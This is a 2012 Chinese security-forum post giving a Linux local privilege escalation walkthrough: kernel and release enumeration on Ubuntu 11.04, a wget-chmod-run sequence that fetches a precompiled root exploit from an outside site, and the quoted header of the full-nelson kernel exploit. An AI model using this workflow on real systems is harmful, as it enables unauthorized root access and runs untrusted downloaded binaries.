切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
362 LINUX GET ROOT 提权[复制链接]
发表于 2012-11-24 10:39:37 | 显示全部楼层 |!read_mode!
参考:http://baoz.net/linux-localroot-no-patch-again/
http://baoz.net/linux-sockops-wrap-proto-ops-local-root-exploit/



关于名词解释不复制了 百度 GG一下
http://baike.baidu.com/view/573460.htm


大部分的LOCAL ROOT 都是内核漏洞 很难进行权限提升 因为一个命令久能升级整个系统


打开UBUNTU 首先 查看内核版本


  1. brk@Dis9Team:~$ id
  2. uid=1000(brk) gid=1000(brk) groups=1000(brk),4(adm),20(dialout),24(cdrom),46(plugdev),112(lpadmin),120(admin),122(sambashare)
  3. brk@Dis9Team:~$ uname -a
  4. Linux Dis9Team 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 03:31:50 UTC 2011 i686 i686 i386 GNU/Linux
  5. brk@Dis9Team:~$ cat /proc/version
  6. Linux version 2.6.38-8-generic (buildd@vernadsky) (gcc version 4.5.2 (Ubuntu/Linaro 4.5.2-8ubuntu3) ) #42-Ubuntu SMP Mon Apr 11 03:31:50 UTC 2011
复制代码
查看发布版本


  1. brk@Dis9Team:~$ lsb_release -a
  2. No LSB modules are available.
  3. Distributor ID:        Ubuntu
  4. Description:        Ubuntu 11.04
  5. Release:        11.04
  6. Codename:        natty
  7. brk@Dis9Team:~$
复制代码


系统类型


  1. brk@Dis9Team:~$ file /bin/bash
  2. /bin/bash: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, stripped
  3. brk@Dis9Team:~$
复制代码


无GCC环境 (没GCC权限 或者没装)

去搜索别人编译好的版本 例如:http://lucky.fuzzexp.org/file/localroot/ 下载到本地 给权限直接运行


  1. brk@Dis9Team:~$ wget http://lucky.fuzzexp.org/file/localroot/2.6.x/x.zip
  2. brk@Dis9Team:~$ unzip x.zip
  3. brk@Dis9Team:~$ chmod +x ./x
  4. brk@Dis9Team:~$ ./x
  5. Segmentation fault
复制代码

有GCC环境 (能执行GCC) 自己搜索编译
别去EXPLOIT-DB搜索漏洞 因为一个LOCAL 可能影响很多版本 看这个http://www.securityfocus.com/bid/27704/info


注意 多看EXP的注释 例如 http://www.exploit-db.com/exploits/15704/

  1. /*
  2. * Linux Kernel <= 2.6.37 local privilege escalation
  3. * by Dan Rosenberg
  4. * @djrbliss on twitter
  5. *
  6. * Usage:
  7. * gcc full-nelson.c -o full-nelson
  8. * ./full-nelson
  9. *
  10. * This exploit leverages three vulnerabilities to get root, all of which were
  11. * discovered by Nelson Elhage:
复制代码

他一般会告诉你如何做 有些EXP有点特殊 他也会说



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。
发表于 2014-4-28 14:06:25 | 显示全部楼层
怎么看不了啊?真是的。。。
发表于 2014-4-28 18:09:22 | 显示全部楼层
/thread-2544-1-1.html

代码区

GMT+8, 2020-9-23 13:22

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部